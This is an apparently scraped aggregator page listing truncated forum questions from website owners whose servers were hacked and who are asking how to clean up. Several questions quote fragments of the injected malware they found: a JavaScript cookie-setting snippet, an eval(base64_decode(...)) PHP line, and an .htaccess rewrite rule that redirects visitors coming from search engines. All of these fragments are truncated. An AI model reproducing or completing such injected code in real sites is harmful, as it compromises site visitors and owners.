1

htaccess hacked - i've deleted code and file - what next? [closed]

view story
linux-howto

http://serverfault.com – Possible Duplicate: My server’s been hacked EMERGENCY My website was hacked recently. I think i've found the code that was added to the htaccess file, deleted it and then added script to prevent the htaccess file being accessed again. I've also deleted the php file that the hacked code refers to (common.php). What do i need to do next? I'm not a programmer or website developer but i really wanted to see if i could fix the problem myself as i've spent quite a few hours trying and don't give up easily. Here is the hacked code that i deleted; <IfModule mod_rewrite.c> R (HowTos)

xskl's picture
Submitted by xskl on 10/21/2012

Stories similar to htaccess hacked - i've deleted code and file - what next? [closed]

Possible Duplicate: My server's been hacked EMERGENCY

Our website was hack, all the images in the server were deleted. This happened 3 times already. I asked my boss to change ftp access but he don't want to. Is there a way we can find out who did it? Probably, they know our ftp access? How do we stop it?

Possible Duplicate: My server’s been hacked EMERGENCY

It seems that someone hacked I bunch of sites I own by inserting code in all the .js files.

function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString(

Possible Duplicate: My server's been hacked EMERGENCY

My Ubuntu 10.04 LTS VPS has been hacked, probably via a WordPress site.

I was alerted to it when I noticed the incoming traffic was unusually high.

A WordPress site was littered with eval(base64_decode(...)) code in lots of files.

hacked wordpress 3.5.1 9 weeks 5 days ago

hello, one question, one has hacked that to you know why

- hacked page code removed -

This question already has an answer here:

How do I deal with a compromised server?

10 answers

My wordpress blog has been hacked.

Possible Duplicate: My server's been hacked EMERGENCY

my php based website got infected with malware, which added something like this in the code:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWh));

Now i want to replace all the "eval(" till its ending braces "));" with space or delete all those occurences, either with sed or other tools.

i have tried th

I am switching to new system with a OS using Linux.I will be using another system which has windows ultimate which is hacked.I am being cyber bullied. I have given a reference to this as a question on stackexchange.

I spent all day today chasing malware on the shared hosting for one of my clients.

The issue is as follows: Every 2 hours or so .htaccess file and all other .htaccess files gets modified, on the top of the file these lines are added:

IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|b

I've got a new client whose site looks like it has been hacked. It's running Drupal and I have run Hacked on it to verify that the file structure hasn't changed. I can add the Paranoia module, but it's a bit late.

Unfortunately, the site was developed with a lot of PHP code inserted directly into nodes, so a lot of custom code is sitting in the database. It's all run through eval().